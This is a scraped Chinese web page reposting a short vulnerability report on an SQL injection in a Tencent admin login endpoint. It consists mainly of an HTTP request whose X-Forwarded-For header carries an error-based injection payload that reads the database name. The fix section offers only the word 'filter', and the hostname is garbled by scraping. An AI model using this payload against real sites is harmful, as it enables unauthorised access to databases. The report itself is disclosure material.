好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

腾讯这是一个很经典的SQL注射 - 网站安全 - 自学

腾讯-这是一个很经典的SQL注射

GET /site/login?jsonpCallbackParam=loginJsonpCallback&data_info=1&ajax=true&_=1406730250627 HTTP/1.1

Host: admin测试数据ic.qq测试数据 X-FORWARDED-FOR:192.168.1.1'+ (UpdateXML(1,CONCAT(0x5b,mid( (select database()) ,1,32),0x5d),1)) +' http头注入

漏洞 证明:

 

 

 

修复方案:

过滤

查看更多关于腾讯这是一个很经典的SQL注射 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15293
  阅读:47次

上一篇: 搜狐视频一键劫持妹子通行证 - 网站安全 - 自学

下一篇:cmseasy最新版存储型XSS+代码分析(可绕过xss防护机